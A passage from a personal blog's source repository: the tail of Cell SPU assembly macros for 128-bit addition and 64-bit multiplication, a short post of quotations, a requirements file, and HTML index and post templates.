103 |     cg      alu_reg_t1, alu_reg_t0, alu_reg_t2                              ;\
104 |     a       alu_reg_t0, alu_reg_t0, alu_reg_t2                              ;\
105 |     shlqbyi alu_reg_t1, alu_reg_t1, 4                                       ;\
106 |     a              ret, alu_reg_t0, alu_reg_t1                              ;
107 | 
108 | #define mul_64(ret, lhs, rhs)                                                \
109 |     shufb   alu_reg_i0, lhs, lhs, alu_reg_mul_lhs                           ;\
110 |     shufb   alu_reg_i1, rhs, rhs, alu_reg_mul_rhs                           ;\
111 |     shli    alu_reg_v0, alu_reg_i0, 16                                      ;\
112 |     shli    alu_reg_v1, alu_reg_i1, 16                                      ;\
113 |     mpyu    alu_reg_t0, alu_reg_i0, alu_reg_i1                              ;\
114 |     mpyhhu  alu_reg_t1, alu_reg_i0, alu_reg_v1                              ;\
115 |     mpyhhu  alu_reg_t2, alu_reg_i1, alu_reg_v0                              ;\
116 |     mpyhhu  alu_reg_t3, alu_reg_i0, alu_reg_i1                              ;\
117 |     shufb   alu_reg_v0, alu_reg_t0, alu_reg_t0, alu_reg_mul_m0              ;\
118 |     shufb   alu_reg_v1, alu_reg_t3, alu_reg_t3, alu_reg_mul_m1              ;\
119 |     shufb   alu_reg_v2, alu_reg_t0, alu_reg_t3, alu_reg_mul_m2              ;\
120 |     shufb   alu_reg_v3, alu_reg_t1, alu_reg_t1, alu_reg_mul_m3              ;\
121 |     shufb   alu_reg_v4, alu_reg_t2, alu_reg_t2, alu_reg_mul_m3              ;\
122 |     shufb   alu_reg_v5, alu_reg_t1, alu_reg_t1, alu_reg_mul_m4              ;\
123 |     shufb   alu_reg_v6, alu_reg_t2, alu_reg_t2, alu_reg_mul_m4              ;\
124 |     add_128(alu_reg_v0, alu_reg_v0, alu_reg_v1)                             ;\
125 |     add_128(alu_reg_v2, alu_reg_v2, alu_reg_v3)                             ;\
126 |     add_128(alu_reg_v4, alu_reg_v4, alu_reg_v5)                             ;\
127 |     add_128(alu_reg_v0, alu_reg_v0, alu_reg_v2)                             ;\
128 |     add_128(alu_reg_v0, alu_reg_v0, alu_reg_v4)                             ;\
129 |     add_128(alu_reg_v0, alu_reg_v0, alu_reg_v6)                             ;\
130 |     shufb          ret, alu_reg_v0, alu_reg_v0, alu_reg_se64                ;
131 | 
132 | // Functions
133 | 
134 |     .global alu_constants_init
135 |     .type   alu_constants_init, @function
136 | alu_constants_init:
137 |     ila   alu_reg_t0, alu_endian
138 |     lqd   alu_reg_se32,    0x00(alu_reg_t0)
139 |     lqd   alu_reg_se64,    0x10(alu_reg_t0)
140 |     lqd   alu_reg_se128,   0x20(alu_reg_t0)
141 |     ila   alu_reg_t0, alu_wswap
142 |     lqd   alu_reg_mul_lhs, 0x00(alu_reg_t0)
143 |     lqd   alu_reg_mul_rhs, 0x10(alu_reg_t0)
144 |     ila   alu_reg_t0, alu_mul64_constants
145 |     lqd   alu_reg_mul_m0,  0x00(alu_reg_t0)
146 |     lqd   alu_reg_mul_m1,  0x10(alu_reg_t0)
147 |     lqd   alu_reg_mul_m2,  0x20(alu_reg_t0)
148 |     lqd   alu_reg_mul_m3,  0x30(alu_reg_t0)
149 |     lqd   alu_reg_mul_m4,  0x40(alu_reg_t0)
150 |     ila   alu_reg_t0, alu_add64_constants
151 |     lqd   alu_reg_add_m64, 0x00(alu_reg_t0)
152 |     bi    $lr
153 | 


--------------------------------------------------------------------------------
/posts/2024-04-28-quotes/_main.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: live
 3 | date: 2024-04-28
 4 | title: Quotes
 5 | author: Alexandro Sanchez
 6 | ---
 7 | 
 8 | "Wir müssen wissen. Wir werden wissen." — David Hilbert
 9 |  
10 | "Everyone who confuses correlation with causation eventually ends up dead." — Alan Cooper
11 |  
12 | "I like offending people, because I think the people who get offended should be offended." — Linus Torvalds
13 |   
14 | "The less confident you are, the more serious you have to act." — Tara Ploughman
15 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | markdown==3.3.3
2 | pygments==2.15.0
3 | 


--------------------------------------------------------------------------------
/templates/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <head>
 4 |         <meta charset="utf-8">
 5 |         <meta name="viewport" content="width=device-width, initial-scale=1">
 6 |         <title>Blog</title>
 7 |         <!-- Style -->
 8 |         <link rel="stylesheet" href="css/code.css">
 9 |         <link rel="stylesheet" href="css/markdown.css">
10 |         <style>
11 |             body {
12 |                 box-sizing: border-box;
13 |                 min-width: 200px;
14 |                 max-width: 980px;
15 |                 margin: 0 auto;
16 |                 padding: 45px;
17 |             }
18 | 
19 |             header {
20 |                 position: relative;
21 |             }
22 |             header > .links {
23 |                 position: absolute;
24 |                 right: 0;
25 |             }
26 | 
27 |             footer {
28 |                 text-align: center;
29 |             }
30 |         
31 |             @media (max-width: 767px) {
32 |                 body {
33 |                     padding: 15px;
34 |                 }
35 |             }
36 |         </style>
37 |     </head>
38 |     <body class="markdown-body">
39 |         <header>
40 |             <div class="links">
41 |                 <span>
42 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
43 |                     <a href="https://github.com/AlexAltea">Github</a> |
44 |                     <a href="mailto:alexandro@phi.nz">Email</a>
45 |                 </span>
46 |             </div>
47 |             <h1>Blog</h1>
48 |         </header>
49 |         <article>
50 |             $posts
51 |         </article>
52 |         <hr>
53 |         <footer>
54 |             <p>
55 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
56 |             </p>
57 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
58 |         </footer>
59 |     </body>
60 | </html>
61 | 


--------------------------------------------------------------------------------
/templates/post.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <head>
 4 |         <meta charset="utf-8">
 5 |         <meta name="viewport" content="width=device-width, initial-scale=1">
 6 |         <title>$title</title>
 7 |         <!-- Style -->
 8 |         <link rel="stylesheet" href="../../css/code.css">
 9 |         <link rel="stylesheet" href="../../css/markdown.css">
10 |         <style>
11 |             body {
12 |                 box-sizing: border-box;
13 |                 min-width: 200px;
14 |                 max-width: 980px;
15 |                 margin: 0 auto;
16 |                 padding: 45px;
17 |             }
18 | 
19 |             header {
20 |                 position: relative;
21 |             }
22 |             header > .links {
23 |                 position: absolute;
24 |                 right: 0;
25 |             }
26 | 
27 |             .post-key {
28 |                 background-color: hsl(45, 67%, 80%);
29 |                 border-radius: 5px 0px 0px 5px;
30 |                 padding: 2px 6px 2px 8px;
31 |                 margin: 0px;
32 |             }
33 |             .post-val {
34 |                 background-color: hsl(45, 67%, 90%);
35 |                 border-radius: 0px 5px 5px 0px;
36 |                 padding: 2px 8px 2px 6px;
37 |                 margin: 0px;
38 |             }
39 | 
40 |             footer {
41 |                 text-align: center;
42 |             }
43 |         
44 |             @media (max-width: 767px) {
45 |                 body {
46 |                     padding: 15px;
47 |                 }
48 |             }
49 |         </style>
50 |     </head>
51 |     <body class="markdown-body">
52 |         <header>
53 |             <div class="links">
54 |                 <span>
55 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
56 |                     <a href="https://github.com/AlexAltea">Github</a> |
57 |                     <a href="mailto:alexandro@phi.nz">Email</a>
58 |                 </span>
59 |             </div>
60 |             <span><a href="../../">&lt; Other articles</a></span>
61 |         </header>
62 |         <article>
63 |             <h1>$title</h1>
64 |             <p>
65 |                 <span 
66 |                     class="post-key">Author</span><span
67 |                     class="post-val">$author</span>
68 |                 <span
69 |                     class="post-key">Date</span><span
70 |                     class="post-val">$date</span>
71 |             </p>
72 |             $content
73 |         </article>
74 |         <hr>
75 |         <footer>
76 |             <p>
77 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
78 |             </p>
79 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
80 |         </footer>
81 |     </body>
82 | </html>
83 | 


--------------------------------------------------------------------------------